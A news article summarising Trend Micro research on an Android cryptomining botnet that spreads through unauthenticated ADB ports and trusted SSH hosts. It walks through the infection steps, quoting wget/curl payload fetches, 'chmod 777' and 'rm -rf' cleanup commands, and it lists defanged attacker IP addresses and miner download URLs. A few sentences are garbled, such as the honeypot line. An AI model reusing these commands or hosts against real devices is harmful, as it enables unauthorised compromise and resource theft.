A new cryptocurrency-mining botnet has been detected exploiting
Android Debug Bridge ports, a system designed to resolve app defects
installed on a majority of Android phones and tablets.
The botnet malware, as reported by Trend Micro, has been detected in 21 countries and is most prevalent in South Korea.
The attack takes advantage of the way open ADB ports don’t require
authentication by default, and once installed is designed to spread to
any system that has previously shared an SSH connection. SSH connections
connect a wide range of devices – everything from mobile to Internet of
Things (IoT) gadgets – meaning a lot of products are susceptible.
“Being a known device means the two systems can communicate with each
other without any further authentication after the initial key
exchange, each system considers the other as safe,” the researchers say.
“The presence of a spreading mechanism may mean that this malware can
abuse the widely used process of making SSH connections.”
It begins with an IP address.
45[.]67[.]14[.]179 arrives through the ADB and uses the command shell
to update the working directory to “/data/local/tmp,” as .tmp files
often have default permission to execute commands.
Once the bot determines its entered a honeypot, it uses the wget
command to download the payload of three different miners, and curl if
wget is not present in the infected system.
The malware determines which miner is best suited to exploit the
victim depending on the system’s manufacturer, architecture, processor
type, and hardware.
An additional command, chmod 777 a.sh, is then executed to change the
permission settings of the malicious drop. Finally, the bot conceals
itself from the host using another command, rm -rf a.sh*, to delete the
downloaded file. This also hides the trail of where the bug originated
from as it spreads to other victims.
Researchers examined the invading script and determined the three
potential miners that can be used in the attack – all delivered by the
same URL – are:
http://198[.]98[.]51[.]104:282/x86/bash
http://198[.]98[.]51[.]104:282/arm/bash
http://198[.]98[.]51[.]104:282/aarch64/bash
They also found the script enhances the host’s memory by enabling
HugePages, which enables memory pages that are greater than its default
size, to optimize mining output.
If miners are already found using the system the botnet attempts to
invalidate their URL and kill them by changing the host code.
Pernicious and malicious cryptomining drops are continually evolving
new ways to exploit their victims. Last summer, Trend Micro observed
another ADB-exploiting that they dubbed the Satoshi Variant.
Outlaw, was spotted in the past weeks spreading another Monero mining
variant across China through brute-force attacks against servers. At
the time researchers hadn’t determined whether the botnet had begun
mining operations, but found an Android APK in the script, indicating
Android devices may be targeted.
source link
